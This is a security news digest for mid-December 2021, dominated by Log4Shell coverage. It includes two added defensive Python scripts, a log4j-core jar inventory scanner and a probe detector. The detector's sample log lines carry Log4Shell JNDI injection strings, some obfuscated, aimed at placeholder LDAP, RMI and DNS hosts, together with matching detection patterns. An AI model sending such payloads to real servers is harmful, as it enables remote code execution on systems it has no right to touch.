Sat. Dec 11, 2021 - Fri. Dec 17, 2021


When is a Scrape a Breach?

Troy Hunt

A decade and a bit ago during my tenure at Pfizer, a colleague's laptop containing information about customers, healthcare providers and other vendors was stolen from their car. The machine had full disk encryption and it's not known whether the thief was ever actually able to access the data. It's not clear if the car was locked or not.


Banks Must Report Cyber Incidents Beginning in May 2022

Lohrman on Security

U.S. financial institutions are leaders in global cyber defense. Recently approved rules will mandate the reporting of security incidents next year. We explore the topic with cybersecurity expert Michael McLaughlin.



Microsoft Patch Tuesday, December 2021 Edition

Krebs on Security

Microsoft, Adobe, and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month's Patch Tuesday is overshadowed by the "Log4Shell" 0-day exploit in a popular Java logging library (Apache Log4j 2) that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.


More Log4j News

Schneier on Security

Log4j is being exploited by all sorts of attackers, all over the Internet. At one point it was reported that there were over 100 attempts to exploit the vulnerability every minute. "Since we started to implement our protection we prevented over 1,272,000 attempts to allocate the vulnerability, over 46% of those attempts were made by known malicious groups," said cybersecurity company Check Point.


IDC Analyst Report: The Open Source Blind Spot Putting Businesses at Risk

In a recent study, IDC found that 64% of organizations said they were already using open source in software development with a further 25% planning to in the next year. Most organizations are unaware of just how much open-source code is used and underestimate their dependency on it. As enterprises grow the use of open-source software, they face a new challenge: understanding the scope of open-source software that's being used throughout the organization and the corresponding exposure.


Weekly Update 274

Troy Hunt

As I start out by saying in this week's video, it's very much summer here and not a day goes by without multiple pool visits. Next week's video is going to be from somewhere epically amazing out of this world that I've wanted to go to for a long time now, so stay tuned for that one as I go mobile again. Somehow, today's video stretched out beyond an hour with what felt like a list of pretty minor discussion points, but plenty of good questions and commentary along the way.


New Microsoft Exchange credential stealing malware could be worse than phishing

Tech Republic Security

While looking for additional Exchange vulnerabilities in the wake of this year's zero-days, Kaspersky found an IIS add-on that harvests credentials from OWA whenever, and wherever, someone logs in.


11 penetration testing tools the pros use

CSO Magazine

A penetration tester, sometimes called an ethical hacker, is a security pro who launches simulated attacks against a client's network or systems in order to seek out vulnerabilities. Their goal is to demonstrate where and how a malicious attacker might exploit the target network, which allows their clients to mitigate any weaknesses before a real attack occurs.


Hackers start pushing malware in worldwide Log4Shell attacks

Bleeping Computer

Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers. This article compiles the known payloads, scans, and attacks using the Log4j vulnerability.


Critical Log4Shell security flaw lets hackers compromise vulnerable servers

Tech Republic Security

Apache has patched the vulnerability in its Log4j 2 library, but attackers are searching for unprotected servers on which they can remotely execute malicious code.


Finding “Attackable” Open Source Vulnerabilities in JavaScript

Security Boulevard

Finding attackable open source vulnerabilities in JS applications with an intelligent SCA approach. Open Source Software (OSS) is at the core of today’s information technology. About 80% of companies run their operations on OSS and 96% of applications are built using open source components. Most of today’s commercial products are shipped with some OSS libraries.


Beware of Pixels & Trackers on U.S. Healthcare Websites

The healthcare industry has massively adopted web tracking tools, including pixels and trackers. Tracking tools on both authenticated and unauthenticated web pages can capture protected health information (PHI) such as IP addresses, medical record numbers, home and email addresses, appointment dates, or other information users enter on those pages, and so can violate the HIPAA Rules governing the use of online tracking technologies by HIPAA covered entities and business associates.


9 video chat apps compared: Which is best for security?

CSO Magazine

The COVID-19 pandemic forced companies to scramble to accommodate employees suddenly working from home. This required a move to cloud-based infrastructures, mobile applications and good collaboration and conferencing tools. The shift was massive for most firms. According to Statista, only 17% of workers in the United States telecommuted even a little prior to the pandemic.


Log4Shell vulnerability: What we know so far

We Live Security

The critical flaw in the ubiquitous Log4j utility has sent shockwaves way beyond the security industry – here's what we know so far.


Botnet steals half a million dollars in cryptocurrency from victims

Tech Republic Security

The botnet uses a tactic called crypto clipping, which relies on malware to steal cryptocurrency during a transaction, says Check Point Research.


Apache Log4j Threatens, Well, Everything

Security Boulevard

It doesn’t get much worse than this, at least according to cybersecurity experts. The RCE bug currently being actively exploited in the widely used Apache Log4j promises to leave a trail of damage and destruction in its wake, even for those who quickly take action against it. “This is a worst-case scenario. The combination of.


Software Composition Analysis: The New Armor for Your Cybersecurity

Speaker: Blackberry, OSS Consultants, & Revenera

Software is complex, which makes threats to the software supply chain more real every day. 64% of organizations have been impacted by a software supply chain attack and 60% of data breaches are due to unpatched software vulnerabilities. In the U.S. alone, cyber losses totaled $10.3 billion in 2022. All of these stats beg the question, “Do you know what’s in your software?”


Amazon explains the cause behind Tuesday’s massive AWS outage

Bleeping Computer

Amazon has published a post-event summary to shed some light on the root cause behind this week's massive AWS outage that took down a long list of high-profile sites and online services, including Ring, Netflix, Amazon Prime Video, and Roku.


Hackers exploit Log4Shell to drop Khonsari Ransomware on Windows systems

Security Affairs

Bitdefender researchers discovered that threat actors are attempting to exploit the Log4Shell vulnerability (CVE-2021-44228) to deliver the new Khonsari ransomware on Windows machines.


How to install Qubes OS as a virtual machine

Tech Republic Security

Qubes OS defines itself modestly as "a reasonably secure operating system." It might actually be one of the safest operating systems, often used by pros who are most concerned with computer security.


NSO Zero-Click Exploit: Turing-Complete CPU in Image File

Security Boulevard

Researchers have reverse engineered NSO group’s recent zero-click iPhone exploit. And it’s a doozy.


From Complexity to Clarity: Strategies for Effective Compliance and Security Measures

Speaker: Erika R. Bales, Esq.

When we talk about “compliance and security," most companies want to ensure that steps are being taken to protect what they value most – people, data, real or personal property, intellectual property, digital assets, or any number of other things - and it’s more important than ever that safeguards are in place. Let’s step back and focus on the idea that no matter how complicated the compliance and security regime, it should be able to be distilled down to a checklist.


What SMBs can do to protect against Log4Shell attacks

Malwarebytes

As you may already know, the business, tech, and cybersecurity industries have been buzzing about Log4Shell (CVE-2021-44228), aka Logjam (not to be confused with the 2015 TLS Diffie-Hellman attack of the same name), a flaw in Apache Log4j 2 versions 2.0-beta9 through 2.14.1 of the logging utility. As the name suggests, a logger is a piece of software that records events that happen in a computer system. The records it produces are useful for IT and security folks to trace errors or check for abnormal behavior within a system.
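The first thing an SMB has to do is find out where Log4j 2 actually lives, which is harder than it sounds because log4j-core usually ships inside application jars, wars and ears rather than as a standalone file. The scanner below is an added example written for this digest; it is not Malwarebytes' code or anything from the Log4j project. It walks a directory, opens every archive it finds (including archives nested up to three levels deep), reads the version from log4j-core's pom.properties and checks whether JndiLookup.class is still present, since a jar with that class deleted is mitigated even at an old version. The version cut-offs encode the published fixed releases (2.15.0, plus the 2.12.2 and 2.3.1 backports for older JVMs); the archive-building helpers at the bottom exist only to construct sample jars for demonstration.

```python
import io
import re
import sys
import zipfile
from pathlib import Path

# Where Maven-built log4j-core jars record their version.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# The class whose presence lets "${jndi:...}" in a logged string reach out to an attacker's server.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 3  # jar inside war inside ear is as deep as we bother to go


def parse_version(pom_properties_text):
    """Return (major, minor, patch) from a pom.properties body, or None if absent."""
    m = re.search(r"^version=(\d+)\.(\d+)(?:\.(\d+))?", pom_properties_text, re.M)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def exposed_to_cve_2021_44228(version):
    """True if this log4j-core version still performs JNDI lookups on message text.

    Fixed in 2.15.0 (hardened further in 2.16.0 and 2.17.0); the Java 7 and Java 6
    backports 2.12.2+ and 2.3.1+ carry the same fix.  Log4j 1.x has no message
    lookups and is not affected by this CVE (it is end-of-life with other issues).
    Pre-release strings such as "2.0-beta9" parse as 2.0.0 and are flagged
    conservatively, which is what you want from an inventory pass.
    """
    major, minor, patch = version
    if major != 2:
        return False
    if (minor, patch) >= (15, 0):
        return False
    if minor == 12 and patch >= 2:
        return False
    if minor == 3 and patch >= 1:
        return False
    return True


def inspect_archive(data, display_name, depth=0):
    """Inspect one archive (as bytes) and any archives nested inside it.

    Returns a list of findings, one dict per log4j-core occurrence.
    """
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not an archive after all; skip quietly
    names = set(zf.namelist())
    if POM_PROPERTIES in names or JNDI_LOOKUP_CLASS in names:
        version = None
        if POM_PROPERTIES in names:
            version = parse_version(zf.read(POM_PROPERTIES).decode("utf-8", "replace"))
        jndi_present = JNDI_LOOKUP_CLASS in names
        findings.append({
            "path": display_name,
            "version": version,
            "jndi_lookup_present": jndi_present,
            # Exposed only if the vulnerable class is actually on the classpath:
            # a 2.14.1 jar with JndiLookup.class removed is mitigated.
            "exposed": jndi_present and (version is None or exposed_to_cve_2021_44228(version)),
        })
    if depth < MAX_NESTING:
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(inspect_archive(zf.read(name), f"{display_name}!/{name}", depth + 1))
    return findings


def scan_directory(root):
    """Walk a directory tree and inspect every archive file found."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            findings.extend(inspect_archive(path.read_bytes(), str(path)))
    return findings


def build_archive(entries):
    """Constructed test fixture: build an in-memory zip from a {name: bytes} mapping."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def fake_log4j_core(version, include_jndi_class=True):
    """Constructed test fixture: the two entries the scanner keys on, nothing else."""
    entries = {POM_PROPERTIES: f"version={version}\n".encode()}
    if include_jndi_class:
        entries[JNDI_LOOKUP_CLASS] = b"\xca\xfe\xba\xbe"  # class-file magic only
    return entries


if __name__ == "__main__":
    # Usage: python scan_log4j.py /opt /srv   (script name is hypothetical)
    for root in sys.argv[1:] or ["."]:
        for f in scan_directory(root):
            print(f"{f['path']}: version={f['version']} jndi_lookup={f['jndi_lookup_present']} exposed={f['exposed']}")
```

Treat every finding with exposed set to True as a patching target: upgrade to 2.17.0 or later (or the 2.12.x/2.3.x backport on old JVMs), or, if you cannot upgrade yet, delete JndiLookup.class from the jar. Setting log4j2.formatMsgNoLookups=true on its own was later shown to be insufficient in some non-default configurations (CVE-2021-45046), so do not stop there. The script only sees artifacts on disk; running containers, vendor appliances and SaaS dependencies need their own inventory.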


Conti ransomware uses Log4j bug to hack VMware vCenter servers

Bleeping Computer

The Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.


The 10 worst password snafus of 2021

Tech Republic Security

Dashlane's sixth annual list of the year's worst password offenders reveals the biggest password security mishaps for 2021.


Securing Kubernetes With XDR

Security Boulevard

Kubernetes is at the forefront of the container orchestration market. A majority of organizations running container workloads manage at least some of them via Kubernetes. However, according to the Red Hat State of Kubernetes Security report, 94% of organizations encountered a serious security incident within their container environment. Of these, 69% of these incidents were.


Successful Change Management with Enterprise Risk Management

Speaker: William Hord, Vice President of ERM Services

A well-defined change management process is critical to minimizing the impact that change has on your organization. Leveraging the data that your ERM program already contains is an effective way to help create and manage the overall change management process within your organization. Your ERM program generally assesses and maintains detailed information related to strategy, operations, and the remediation plans needed to mitigate the impact on the organization.


5 warning signs your identity has been stolen

We Live Security

By spotting these early warning signs of identity theft, you can minimize the impact on you and your family.


A phishing campaign targets clients of German banks using QR codes

Security Affairs

Cofense researchers discovered a new phishing campaign using QR codes that has targeted German e-banking users in recent weeks. Threat actors continue to use multiple techniques to avoid detection and trick recipients into opening phishing messages, including the use of QR codes. The messages used in the campaign recently discovered by Cofense use QR codes to deceive users of two German financial institutions, Sparkasse and Volksbanken Raiffeisenbanken, and steal digital banking information.


Log4j: How to protect yourself from this security vulnerability

Tech Republic Security

As cybercriminals scan for susceptible servers, there are steps you can take to mitigate the Log4j critical vulnerability.


Ransomware Actors Attack Most Often on Fridays

Security Boulevard

Criminals are detonating ransomware at targeted organizations seven days a week, leaving enterprises with essentially no time to shore up their security operations. But a recent study revealed that Friday was the most popular day for ransomware attackers to strike, perhaps attempting to capitalize on employees’ desire to leave for the weekend and the anticipated.


Cover Your SaaS: How to Overcome Security Challenges and Risks For Your Organization

Speaker: Ronald Eddings, Cybersecurity Expert and Podcaster

So, you’ve accomplished an organization-wide SaaS adoption. It started slow, and now just a few team members might be responsible for running Salesforce, Slack, and a few other applications that boost productivity, but it’s all finished. Or is it? Through all the benefits offered by SaaS applications, it’s still a necessity to onboard providers as quickly as possible.


Three ways banks can ensure a sustainable future

CyberSecurity Insiders

North American audiences are demanding sustainable corporate initiatives more than ever. Both large financial institutions as well as community banks and credit unions are responding to growing pressure to step up pro-environmental standards from various stakeholders, including consumers, employees, investors, competitors, ecosystem partners and government entities.


Protecting against Log4j with Secure Firewall & Secure IPS

Cisco Security

The Apache Log4j vulnerability (CVE-2021-44228) has taken the Internet by storm in the past few days. This blog details quick ways Secure Firewall Threat Defense (FTD) and Secure IPS users can protect against attacks leveraging this vulnerability while patching their infrastructure. Talos first released updated Snort rules on Friday, December 10. For customers inspecting ingress traffic, with decryption if the traffic is TLS (Transport Layer Security) encrypted, these rules will alert and can block.
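Signature-based inspection, whether in Snort or a WAF, has to contend with the obfuscated forms of the lookup string that attackers switched to within hours: nested lookups such as ${${lower:j}ndi:...} and ${${::-j}${::-n}${::-d}${::-i}:...}, plus URL-encoded variants. What follows is an added example for this digest, not Cisco or Talos code: a small Python normaliser that URL-decodes and resolves the lower/upper and default-value lookup forms before matching, run over a handful of constructed web-server access-log lines (the addresses are documentation ranges, not real traffic). It shows why a naive grep for ${jndi: misses much of the probing, and why anything containing ${ in an inbound header or URL deserves a look.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): one clean request,
# then common Log4Shell probe shapes in the User-Agent, query string and path.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.5/x} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '203.0.113.10 - - [10/Dec/2021:14:02:14 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F198.51.100.6%2Fx%7D HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.11 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/probe}"',
    '203.0.113.12 - - [10/Dec/2021:14:02:16 +0000] "GET /search?q=%24%7Bjndi HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

# ${anything:-default} evaluates to "default" when the lookup fails; attackers use
# it with an empty lookup name (${::-j}) to spell out "jndi" one letter at a time.
LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# ${lower:X} / ${upper:X} case-convert their argument.
LOOKUP_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
# Fully formed lookup with a scheme (ldap, ldaps, rmi, dns, iiop, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)
# Fragment without a scheme: weaker evidence, still worth flagging.
PARTIAL_JNDI = re.compile(r"\$\{\s*jndi", re.I)


def normalize(text, max_rounds=10):
    """URL-decode and resolve innermost lookups repeatedly until the text stops changing.

    Bounded so a pathological input cannot keep us looping.
    """
    for _ in range(max_rounds):
        previous = text
        text = unquote(text)
        text = LOOKUP_DEFAULT.sub(lambda m: m.group(1), text)
        text = LOOKUP_CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        if text == previous:
            break
    return text


def scan_line(line):
    """Return a finding dict for one log line, or None if nothing suspicious."""
    text = normalize(line)
    m = JNDI_LOOKUP.search(text)
    if m:
        return {"scheme": m.group(1).lower(), "evidence": text[m.start():m.start() + 80]}
    m = PARTIAL_JNDI.search(text)
    if m:
        return {"scheme": None, "evidence": text[m.start():m.start() + 80]}
    return None


def scan_log(lines):
    """Return [(line_number, finding)] for every line that looks like a Log4Shell probe."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = scan_line(line)
        if finding:
            findings.append((number, finding))
    return findings


if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_LOG_LINES):
        confidence = "confirmed" if finding["scheme"] else "partial"
        print(f"line {number}: {confidence} scheme={finding['scheme']} {finding['evidence']}")
```

Two caveats a detection engineer would add: a hit in an edge log proves an attempt, not a compromise, since the string still has to reach a vulnerable log4j-core and actually be logged; and the normaliser covers the common lookup tricks but not every one (for example ${env:...} or ${sys:...} wrappers whose values only resolve on the server), so keep the partial ${jndi indicator as a lower-confidence alert rather than dropping it.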


Kodachi is the operating system for those who value privacy but don't want to learn Linux

Tech Republic Security

For anyone looking to gain an extra layer of privacy on a desktop or laptop, Kodachi Linux might be the perfect option. Jack Wallen highlights this live Linux distribution.


Boost your Cyber Security Awareness

Security Boulevard

October is Cyber Security Awareness month. Cyber Security Awareness month was officially launched by the National Cyber Security Alliance (NCSA) and the Department of Homeland Security (DHS) in October of 2004. At first, the effort was aimed around common cyber security facts and advice. Since then, the two organizations have worked collaboratively to provide education,


How Preparation and Strategy Can Be Used to Fight and Defeat Any Ransomware Attack

Speaker: Karl Camilleri, Cloud Services Product Manager at phoenixNAP

Did you know that 2021 was a record-breaking year for ransomware? The days of a “once in a while” attack against businesses and organizations are over. Cyberthreats have become a serious issue. With 495.1 million attacks, the threat marked a 148% increase compared to 2020 and was the most expensive year on record! As a result, data protection needs to be a concern for most banks, businesses, and information technology specialists.